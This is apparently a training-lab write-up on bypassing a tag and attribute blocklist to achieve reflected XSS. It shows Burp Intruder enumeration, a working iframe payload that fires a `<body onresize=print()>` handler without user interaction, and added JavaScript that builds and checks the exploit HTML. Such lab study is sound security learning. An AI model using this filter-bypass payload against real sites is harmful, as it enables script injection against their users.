[XSS] Lab: Reflected XSS into HTML context with most tags and attributes blocked
Since the page has a search box, start by submitting a canary string and looking for where it appears in the response source and in the DOM.
By appending an HTML comment sequence to the canary we can confirm that the input is reflected unencoded into an HTML context, so we can break out and inject our own markup.
Since this lab blocks most tags, use Burp Intruder with a tag wordlist in the search parameter to see which ones get through (blocked payloads are rejected, allowed ones come back reflected).
The only tag that was not blocked was body:
Now repeat the same enumeration with an event-handler wordlist to see which attributes it is blocking:
A handful of event-handler attributes were allowed through, but the important one is onresize.
We can deliver this via an iframe on the exploit server: the iframe's onload handler changes the frame's width, which resizes the victim document's viewport and fires the injected body's onresize handler with no user interaction.
The iframe's src is the lab URL with our payload in the search parameter.
<iframe id="test" src="https://0a39003a04afa69f8288a7b20027008c.web-security-academy.net/?search=%3Cbody+onresize%3Dprint()%3E" onload=this.style.width='100px'></iframe>
The payload is URL-encoded so that its angle brackets and the = cannot terminate the src attribute early (a raw " or < inside src="..." would break the iframe), and print() needs no quotes around it.
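To make the two halves of the write-up concrete (the Intruder enumeration and the iframe delivery), here is an added JavaScript example that is not part of the original post. It builds the exploit-server HTML with the payload properly URL-encoded, checks that the src attribute survives intact, and shows the enumeration step as a generic filter over candidate tags and events. The LAB_HOST value is a placeholder for your own lab instance, and mockFilter is a constructed stand-in for the lab's WAF used only so the example runs offline; it is not the lab's real rule set.

```javascript
// Added example, not code from the original write-up.
// LAB_HOST is a placeholder: substitute your own lab instance hostname.
const LAB_HOST = "0a39003a04afa69f8288a7b20027008c.web-security-academy.net";

// The reflected payload: the one tag the filter allows (body) with the one
// useful surviving event handler (onresize). print() needs no quotes.
const PAYLOAD = "<body onresize=print()>";

// Build the victim URL. encodeURIComponent turns < > = " and spaces into %XX
// sequences, so nothing in the payload can close the iframe's src="..." attribute.
function buildSearchUrl(host, payload) {
  return `https://${host}/?search=${encodeURIComponent(payload)}`;
}

// Exploit-server body. onload fires once the victim page has rendered;
// changing the frame's width resizes that document's viewport, which fires
// the injected body's onresize handler and calls print() without user action.
function buildExploitHtml(host, payload = PAYLOAD) {
  const src = buildSearchUrl(host, payload);
  return `<iframe src="${src}" onload="this.style.width='100px'"></iframe>`;
}

// Check that the src attribute was not terminated early by a raw quote or
// angle bracket in the payload. Returns true when the value looks like a
// complete absolute URL with the payload still encoded.
function srcAttributeIsIntact(html) {
  const m = html.match(/src="([^"]*)"/);
  return m !== null && m[1].startsWith("https://") && !m[1].includes("<");
}

// Intruder-style enumeration: run every candidate through a template and keep
// the ones the probe accepts. `probe` is whatever tells you the server let the
// payload through (in Burp: response status/length; here: a mock filter).
function enumerateAllowed(candidates, template, probe) {
  return candidates.filter((c) => probe(template(c)));
}

// Constructed mock of the lab's filter (an assumption for offline use):
// rejects every tag except body and every event handler except onresize.
function mockFilter(payload) {
  const tag = payload.match(/^<([a-z]+)/i);
  if (tag && tag[1].toLowerCase() !== "body") return false;
  const ev = payload.match(/\s(on[a-z]+)=/i);
  if (ev && ev[1].toLowerCase() !== "onresize") return false;
  return true;
}

// Candidate wordlists; in practice these come from a much longer cheat sheet.
const TAGS = ["script", "img", "svg", "iframe", "body", "a"];
const EVENTS = ["onload", "onerror", "onmouseover", "onresize", "onfocus"];

function allowedTags() {
  return enumerateAllowed(TAGS, (t) => `<${t}>`, mockFilter);
}

function allowedEvents() {
  return enumerateAllowed(EVENTS, (e) => `<body ${e}=1>`, mockFilter);
}

console.log(allowedTags(), allowedEvents());
console.log(buildExploitHtml(LAB_HOST));
```

Paste the output of buildExploitHtml into the exploit server body and deliver it to the victim; the src check is worth running whenever a payload contains quotes, since a broken attribute fails silently rather than reporting an error.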